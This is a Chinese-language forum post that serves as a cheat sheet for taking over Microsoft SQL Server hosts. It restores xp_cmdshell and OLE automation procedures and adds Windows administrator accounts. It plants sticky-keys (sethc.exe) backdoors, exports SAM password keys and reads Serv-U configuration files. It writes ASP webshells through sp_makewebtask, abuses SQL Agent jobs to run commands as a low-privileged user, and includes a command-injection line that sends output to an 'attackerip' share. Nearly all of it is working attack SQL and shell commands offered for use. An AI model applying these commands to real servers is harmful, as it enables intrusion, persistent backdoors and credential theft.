1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号0 m! F$ X" @6 t1 U4 U9 }( Z0 k
恢复方法:查询分离器连接后,* T' J. U& o% C( ^
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 3 h* s& z* P3 C, | ?# n
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' % l( T" S1 k, Q
然后按F5键命令执行完毕
* e6 J; m- O! Y3 M! l/ F9 a9 ^" K% ^& G% ? x
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- p4 w) A3 w! F7 @4 \9 {恢复方法:查询分离器连接后,
' h) H% l# z& A* A( w第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
9 e, w0 _/ q; S* t6 R2 { l) j/ P5 S第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 u9 w1 H6 H8 D( \0 ?- f& J, d然后按F5键命令执行完毕
! U0 q0 @- S5 }+ H" G. u9 V/ W4 w1 ^+ z/ I% ^) h
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" K1 D9 @1 Y* x7 n4 q2 u* f恢复方法:查询分离器连接后,
7 ~7 k) B1 X' O* b! q第一步执行:exec sp_dropextendedproc 'xp_cmdshell'! {/ v0 q3 E9 p' z: o1 U
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 2 g7 Q; z4 _% {8 B" ^+ c# @; @6 c
然后按F5键命令执行完毕
8 y7 \: R! b7 c% }0 @. b; Q* v& w* S1 n/ g& `9 u* j+ M" j) L8 b$ ?
4 终极方法.' }8 Z; y/ [3 d4 x7 s! ?1 i
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 m, a) j1 ?/ E5 |& ~, t7 B4 b
查询分离器连接后,7 r! S9 J* h: r2 h! `
2000servser系统:
- ~: v0 |* u& _+ ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
8 M/ w6 C' x* |
' M! q5 h- a- G9 }( o+ qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'* T8 `2 b$ |9 {+ u
* _7 J/ ~. w1 ? N
xp或2003server系统:* ]9 |$ N; F \/ x/ A7 K, i
4 m2 h( m5 [; g, E4 Y/ N# [+ U8 ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
4 b6 i9 G% f) n' Y0 ]' U
5 f4 j2 g `6 v4 {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
" }, d- R8 U4 [: ]' r' t, X1 S l3 V% ~5 X
+ i) A4 v5 O6 h/ H) [, Y& @
五个SHIFT
2 L7 j. O6 K, o# w C- |8 qdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';; t& A3 {" }$ ?
! ?1 f' O; ^1 M3 Ideclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 4 u! O; P# w2 [1 T; q
, d; i3 s7 C) V; l5 j
xp_cmdshell执行命令另一种方法& a& a1 A% m @! J+ e4 n
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' + B9 |4 p8 T) k
, N+ Z4 x( P! }( Y3 O8 ?判断存储扩展是否存在
* N5 E7 M3 {# c! E6 k7 g* L- sSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
& c5 |* z! I% q7 }- C返回结果为1就OK
1 t! X- j: i3 M1 s+ X: E& m8 b- B# x% f e
; K4 L: q* w( a7 I
上传xplog70.dll恢复xp_cmdshell语句:, ?* ^' G+ u8 T9 g/ H; O
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'1 s8 e) F' O) K9 G: z. T
8 ]$ q& g1 j) n* R. z( I
否则上传xplog7.0.dll* n( K3 \3 U* r% D
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
1 n. Y0 f" K# S0 D+ f$ @! p' R% G9 u5 r! u3 D
; D f9 O0 m3 l& b- j' l0 r4 y5 Y8 N4 m0 Y
首先开启沙盘模式: `) K/ x7 T* l2 }6 d ~6 O: ~
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 h) e: k5 L, {9 u5 g
# H' S+ Q. C0 O) j然后利用jet.oledb执行系统命令% [. v4 I- u7 w! V7 K e8 y
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')9 o; X4 f b6 E9 ?$ t3 i- x* m
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了5 s" N" @ R: Q2 r4 v/ ], k
2 _, O. m/ @! I4 ? Y1 c, P% Z0 q) x& i6 V1 S2 w; Z
( ]' o, [/ y1 O恢复过程sp_addextendedproc 如下:
! J- S$ w# A& P2 }1 w. Y$ V6 Z- acreate procedure sp_addextendedproc --- 1996/08/30 20:13 : ?; c7 ]( v- R, G) A) G
@functname nvarchar(517),/* (owner.)name of function to call */
% P4 V/ U2 B; w, s; B@dllname varchar(255)/* name of DLL containing function */ ( W' T" m: x8 v1 U$ D3 o, G0 V
as 9 ~/ P) d1 Z% O4 r% h* e$ A
set implicit_transactions off # J$ N+ {$ L; X9 k6 p5 I, _
if @@trancount > 0 8 k9 Q; c/ }; g, i* b
begin % \- Z q" R1 ]
raiserror(15002,-1,-1,'sp_addextendedproc') - Q) a# C9 O+ f
return (1)
( g. {! j, s send / j( A9 L* b1 Q
dbcc addextendedproc( @functname, @dllname)
# O; m+ E+ ?: j& Y6 b' T4 }/ Nreturn (0) -- sp_addextendedproc " p# k/ ]: k6 c6 f- K* T1 p/ s5 L
GO 6 w" R& [# q$ L
. T. Z) }. z# S) J: N- y
" O) A# D& p$ N; L0 i2 Q
4 H) z) f$ s- [# Y
导出管理员密码文件
% N7 r9 K/ }0 _: Q) w8 l" fsa默认可以读sam键.应该。7 ^+ w6 D- y+ P
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
6 ?! @, Z4 I, t* R% K) _* ~net user administrator test+ b) B! ~" K' C, R4 s& \
用administrator登陆.
9 G; q6 k% k7 Y( u3 U4 G: A用完机器后
( n8 \5 @, {5 [6 @9 d+ zreg import c:\test.reg% n k0 m c8 b$ w, v$ q! J
根本不用克隆.
/ ~* i0 A: @, Z# l- J9 y找到对应的sid.
& [) W- i2 D/ J# l8 ^, M4 D! e' [# r, E3 W: r6 e* x, ]0 h; H) T
# @' M1 D( R% J! i5 E
6 [" h6 b3 o; d) b! `
恢复所有存储过程, i4 W/ w5 C2 o) e
use master % O5 W% ]! Y# w) k8 K0 h* u4 X
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' ; z! }- g& _& f: y* @
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 8 s: [5 C7 S; ]0 }" Z
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' ( }$ k+ E$ I! W% Q
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
# g2 Z7 V' V6 @$ R" B |/ Bexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 9 `/ X3 G% z3 D0 c
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 5 @. `1 s+ v7 j0 T G
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' ( E& S! X3 `7 C5 ]) X2 a' B$ b
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
# x/ i- A, _; Z$ F5 ]& y1 Q" dexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
) ~$ r* A$ w1 G \exec sp_addextendedproc sp_OAMethod,'odsole70.dll' $ Q8 n, c9 z1 X
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
9 {. g2 P& g" Gexec sp_addextendedproc sp_OAStop,'odsole70.dll'
! w+ ]! r+ F( k5 q# ~exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 1 }% V" H! d: C% w
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
5 ]# \4 t- [" Q+ V' i0 s+ ]! Sexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 7 `- y p1 v" s s9 L9 ^
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' ' ~: R6 [) {" o3 w3 _2 W/ i
exec sp_addextendedproc xp_regread,'xpstar.dll'
$ o" U6 q2 i9 @exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 1 }; V; T$ F+ U% k4 j% d
exec sp_addextendedproc xp_regwrite,'xpstar.dll' 7 U7 R! [- ]: I, ^7 m# [
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'& v1 F% X6 y# x
- E! `" E( P7 @0 _4 u/ m% W, k' ~) ^6 t- a& y: O- p
建立读文件的存储过程, _7 V9 B1 r* R
Create proc sp_readTextFile @filename sysname
9 N. b( S- y3 t. das
! a4 ]( _+ C/ Z$ L0 C' q+ r0 W% \& X+ h$ R/ W/ b* p7 |
begin
3 A! }0 @7 j' z/ t* E, L8 l3 D1 w8 P$ M* l set nocount on
# T, n" N8 w1 Q& _6 ^# b Create table #tempfile (line varchar(8000))
: N# W7 |+ U* N7 N7 o exec ('bulk insert #tempfile from "' + @filename + '"')
; G1 ]# B% F& s, n& N) f! W+ J7 v+ P% @" s select * from #tempfile
" J6 Z+ M" `# N7 m! @0 M drop table #tempfile
) ]& U+ p2 J+ Y9 \; M" QEnd1 k; H! V+ N) M$ w) T
6 _# q. Q3 ?7 d
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
$ n& {8 K; u' k l% ]查看登录用户
2 _3 f0 { p& C/ L" h9 f5 {( d# qSelect * from sysxlogins$ Y! z+ y7 |+ \0 f3 r8 @
) Z) W8 G1 C3 Q" w4 F5 [$ y把文件内容读取到表中
+ y( s+ o+ P/ I5 m3 UBULK INSERT tmp from "c:\test.txt"
! k# A: z# |8 c9 U) \8 ZdElete from 表名 清理表里的内容1 o: w! ^) D+ i5 D! l
create table b_test(fn nvarchar(4000));建一个表,字段为fn2 E/ g* d1 J' e, X L9 N# R; X
7 k1 M* `% ?6 l2 v% G7 g6 T+ J# f: @
- G6 g* a* ?; a6 h, A加sa用户
6 M1 G8 O- Y* f3 Mexec master.dbo.sp_addlogin user,pass;
# t H# ^% |2 t9 d, V, @exec master.dbo.sp_addsrvrolemember user,sysadmin% Y% q+ o6 T# h# Z
7 `7 w/ C* g4 a* B. T& o
8 E4 Q9 i; i8 H; r
- @" g1 V6 n" d3 n$ u1 p读文件代码
7 q% i( O* |" d1 ]+ u0 {+ rdeclare @o int, @f int, @t int, @ret int& A& _8 n6 A- w% E1 q
declare @line varchar(8000)
$ q! `9 \; F8 R; e V6 `exec sp_oacreate 'scripting.filesystemobject', @o out5 ^: k/ p( p1 a) J) S- V
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
" S6 [! U' j% @6 {exec @ret = sp_oamethod @f, 'readline', @line out
7 Z2 ^& h% S' K) x0 u$ ]while( @ret = 0 )' F8 H" V. v0 K3 Y3 l% N6 y" E
begin
' G' [7 ?3 F) L) ~2 Jprint @line k' g: j$ ~ R9 E, Z( y: U
exec @ret = sp_oamethod @f, 'readline', @line out% }. C' O. {. k5 c9 G
end% Y% _. ~2 I+ ^# M' q
. t* [% i x; Q4 v8 o7 h& H. m! _5 q/ E- n+ v! F' f g
写文件代码:
+ H" _ n* t M, Wdeclare @o int, @f int, @t int, @ret int3 ]% u+ R) B5 e4 C" y" x
exec sp_oacreate 'scripting.filesystemobject', @o out
y1 \% p$ ?, Z! n" A: `* qexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 13 z! W% P4 ~( n9 c6 _! a1 |: M
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》2 j3 r$ g* z5 l0 j: o5 B1 G! D* U
! i V4 @0 X- ^6 V
# P0 f, s: ~; y. L1 ]* Q
添加lake2 shell/ T! O3 @7 r, o/ e+ B" I5 O% q% D
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
! N( p0 R* u7 Fsp_dropextendedproc xp_lake2
! _! { ` h: o: y* nEXEC xp_lake2 'net user'( N% B+ w2 `- b% i" o# P
, x* q! {" i- d" |1 Z8 |5 m9 g5 Z) b# }8 ^8 c+ q
得到硬盘文件信息 7 ?" i3 I* n5 L, O
--参数说明:目录名,目录深度,是否显示文件
/ F3 ~$ ^7 ? k% M9 u/ h+ `execute master..xp_dirtree 'c:'
8 v$ `# X6 s" \) Cexecute master..xp_dirtree 'c:',1 9 z9 K$ A J: h+ u$ f+ Z
execute master..xp_dirtree 'c:',1,1 . P2 P4 {5 p: b' b' M
5 q0 y& [- C. r l5 V5 a
( s9 Y+ b+ e5 |6 U0 g读serv-u配置信息
4 m7 s% }% C g8 ?" l. ]- rexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
+ N3 j t$ m7 ~2 G% eexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'/ _& h9 f3 e! C% ? w
& ?" M% V* v! I' v: ^
通过xp_regwrite写SHIFT后门
8 u; ], [$ I+ ]/ x6 y# r; s) `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
6 H. [$ B6 K) W3 W b$ k$ R0 v: V1 j1 Y
2 z0 @/ g) `8 A) u4 Q( y/ Q: J; z, s8 j/ M/ `
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
# i- j& C1 _* X$ h9 D$ N8 Xexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了( }2 U; Z/ R0 k
3 A( z5 e8 t1 m1 N. L
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
( N a* g4 L. Z0 c C: N' b8 ]0 z2 Y J1 }
4 W: k+ s9 X2 ^. c1 H. b! v8 P" W
3 Y. |. p% m# Ksql server 2005下开启xp_cmdshell的办法 ~: f/ G, z% r8 E
" j# C6 c6 w4 tEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
P: {4 @9 Z: |* Y- E ]% g+ Y; u& u) i- q4 v
SQL2005开启'OPENROWSET'支持的方法:
/ y8 D, U. ]! n2 F) f. Q" ] G0 F9 |% y1 |( p
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;" c3 M6 @) [" P+ n
0 V! m" w# _/ \, w8 {! nSQL2005开启'sp_oacreate'支持的方法:6 a5 W; o: Y- A, m2 N
6 q) i- s! _3 C6 _* O- ]
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;5 M7 \. B: c5 g8 C' L& }- B
7 N3 G' p$ ^: C% X
m1 e% ^1 U8 R8 D
9 E" y( w* {# c3 Z! t* T& e5 s# x4 m
9 t3 f% E; D' X2 {1 ~; v: S
' Z8 o6 A' B9 y( E. n+ p8 L
* Y( o Q" ?( u* \ f& |+ `1 t* k- ?1 B
4 x Y! N( G2 v7 {
' i* x: f4 |4 E5 @* J; K' B
- X1 }$ V; p$ g" C$ }% P' o( E6 D/ y/ O6 y! E3 r
* t- |3 }3 Q) _! t$ ?: H; U/ d
: d) _# X; S6 _% O
6 ]$ O* n7 v* U- f T/ x% n) ~( A4 ^( j6 s7 M% L, }
2 `( }( t1 |* j7 m$ i, d
_2 K5 ^" `' T* u
6 M1 z0 } X$ V9 q! d4 @* e
. Z, P: s; J$ U* h+ B- a+ k6 i! _2 s4 Z
7 ^: A- i2 Z4 p% i; o( O6 F/ f
V- ~3 K6 m8 N |6 K, @
0 ` X, |6 e; n) e- T6 ]7 o4 Z# U
5 _; X5 ]" S2 A! M, _; K0 s& j$ k以下方面不知道能不能成功暂且留下研究哈:8 G4 a z9 s7 g& z3 M& }# I
4)
( C3 Q" I5 P5 J3 Tuse msdb; --这儿不要是master哟
) _0 B2 }* X2 q/ y( Q( I1 Bexec sp_add_job @job_name= czy82 ;
" I& {0 X8 ]) a, k- p. kexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;% W+ x/ @' n' Z* U! J% v
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;$ {2 r: |. m! [; _7 m6 ~. m5 \
exec sp_start_job @job_name= czy82 ;
3 V# p+ D( d1 N+ _+ |
0 W5 `+ a0 G% c$ R1 U8 a" W利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以1 Q# d* H. J( `8 [7 m% J& E2 [
执行tsql语句了.0 x+ B8 v& y. u$ p, v- z6 C6 ~5 {
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
1 W6 [( S) B. W! c5 G2 n# c第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)6 b! B" d q' V S1 ?0 C
net start SQLSERVERAGENT9 [# X' v, `' ?
( [) a& y9 b2 g/ z对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的3 K* g8 N$ {9 y5 w$ `/ V# P' ?
USE msdb+ x4 _+ R: M% X5 d4 P
EXEC sp_add_job @job_name = GetSystemOnSQL ,# o# p$ ~8 ~$ F1 ?& _
@enabled = 1, z, C/ `5 e" N9 z& [) s' O0 N
@description = This will give a low privileged user access to
% ]7 A' H, K, c2 `' m1 f# N Zxp_cmdshell ,
. U, Y8 g/ _0 c& U! ]& f( y@delete_level = 1" c9 t% R2 `: n8 B% H8 `
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
+ }5 f1 _( e! h' i8 g* N" U@step_name = Exec my sql ,
; ~# }, u. E! H. ^2 z0 R@subsystem = TSQL ," G6 L* y5 q' B
@command = exec master..xp_execresultset N select exec7 Z ~. m' |, A4 Q
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
R8 u, G; f! O) I! G; x9 w r- rEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,) `; C2 s& H, n
@server_name = 你的SQL的服务器名
2 A! o7 W( A ?( V, b& cEXEC sp_start_job @job_name = GetSystemOnSQL
% _& W+ b' z4 {7 ?) T- Q/ A, N6 d0 C* C: y) d
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
) j) @& N" m, ^+ Y7 E s才让我们可以以public执行xp_cmdshell
3 f6 K* e: o0 M! B: r- H' W p+ U" R: _! a3 W' H$ u( m
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
- R8 [- ~6 l/ N- S在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
( n5 _7 Y/ ?3 k& a) G0 P% A
$ l/ E0 W" ?. I: [4 h6 y2 lUSE msdb
/ w% ]# t; b/ {EXEC sp_add_job @job_name = ArbitraryFilecreate ,$ @% p' x- i: B3 ~. k
@enabled = 1,1 N3 u' r- [) D6 v2 ~' K, Y( r
@description = This will create a file called c:\sqlafc123.txt ,0 ]' D! c/ `" `/ Z u& d5 N
@delete_level = 1* q% o% M( S5 m6 b5 d8 U
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
' X) o7 v$ b! K" U C5 ~: V" S@step_name = SQLAFC ,
( L+ U# @. M' g; c# c@subsystem = TSQL ,1 Z' k: ?" w1 D9 h8 V r4 _
@command = select hello, this file was created by the SQL Agent. ,
; h8 z" h# Q" g4 M3 H@output_file_name = c:\sqlafc123.txt
# e* G( I$ O4 W/ GEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,# f6 q, w& y w$ g: N! L5 R0 q
@server_name = SERVER_NAME ( o; m9 S( V: o0 x2 j/ H' a
EXEC sp_start_job @job_name = ArbitraryFilecreate 3 Z9 F( }' w/ D# A
4 q8 d! A% v I5 F) Z/ Y. [# ]* a
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
- E7 p4 ?' o/ u- D7 m, `/ I" U( m% C' {$ i# F J. J0 l1 `
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
/ T! _' I6 k: c* U- M----------------------------------------------
, r. v; R- n( lhello, this file was created by the SQL Agent.
; g8 b0 h7 Z4 J0 j2 R% {4 y$ n [ N+ d, T/ E3 |
(1 ?????)
2 w2 V+ r' ^! V h% m0 O3 u) U: k% X6 h4 C: i/ @/ Z
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
# R+ ~; J, y) _" b命令的vbs文件到启动目录!8 f" U. [+ I; \# K2 n
9 b$ `8 I) S3 G; z
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)& e. m, ?( Z3 R% T, i
关于sp_MScopyscriptfile 看下面的例子
" z% G, O: m1 E5 w1 E; qdeclare @command varchar(100)
; n9 \, h4 N7 ^! z2 s- ddeclare @scripfile varchar(200) 9 `) t7 A2 k4 v! u+ E1 e* P8 N
set concat_null_yields_null off - i$ y6 X; O0 k
select @command= dir c:\ > "\\attackerip\share\dir.txt" & h. x) w3 C0 x
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
. ]/ S9 e0 N% }$ g$ b7 ~exec sp_MScopyscriptfile @scripfile ,
9 S2 ~0 E$ ?- P4 \3 F
0 }/ R4 f; K0 ?1 s2 O/ x& p8 W+ u2 E这两个东东都还在测试试哟, M5 v$ u% P# n" o2 U+ c5 Y
让MSSQL的public用户得到一个本机的web shell
1 L) X" v( W; P' W7 i- X }+ C' ^; ~# `
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,- H3 M' J9 ^- v' L
--@query= select <img src=vbscript:msgbox(now())> 7 s+ s1 f* \) Q9 ]$ T
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> + b- K; z1 p4 t. L7 o
@query= select 7 [" n& i3 O0 w, S3 @
<%On Error Resume Next 9 e( J# x: c8 [: D! Y0 j* S u- {, h
Set oscript = Server.createObject("wscript.SHELL") ; A9 p6 k& e- t4 I: ~4 G# f( F4 z2 L
Set oscriptNet = Server.createObject("wscript.NETWORK")
" K3 Z4 d1 ]0 }% c) \( s; G9 l: ?Set oFileSys = Server.createObject("scripting.FileSystemObject") 1 k* p0 w4 ~( a' B- G: f: X* h" w
szCMD = Request.Form(".CMD") 0 v8 W4 X% U5 X2 }8 _
If (szCMD <>"")Then
& G+ O: ]. p) z4 zszTempFile = "C:\" & oFileSys.GetTempName()
0 A! `/ x' p+ I# wCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
/ f+ S7 _- L1 e6 nSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
5 K9 P! P1 i) c' S$ B2 REnd If %>
2 I( L0 \, o. D& m1 B7 R" ^9 r<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
0 b# N' l o# R' V; [! d: K: p- n$ ?<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
* c: b- R% I( j6 C</FORM><RE>
! c* V7 g6 N, v, f<% If (IsObject(oFile))Then ! P! o" x. I2 f" `3 ]" o( ]* n
On Error Resume Next
6 v: H/ U- V- M8 BResponse.Write Server.HTMLEncode(oFile.ReadAll)
: T0 l- \7 ~6 a0 J; p$ WoFile.Close / u' p) \% W+ @4 j9 W
Call oFileSys.deleteFile(szTempFile, True) 1 O- m: e5 \% d& `
End If%> * N3 z% e2 R" ^5 ^$ t; Y6 v
</BODY></HTML>
, P2 T, } Y" |0 |" Q$ {$ F; v |
发表于 2012-9-15 14:37:30
收藏
支持
反对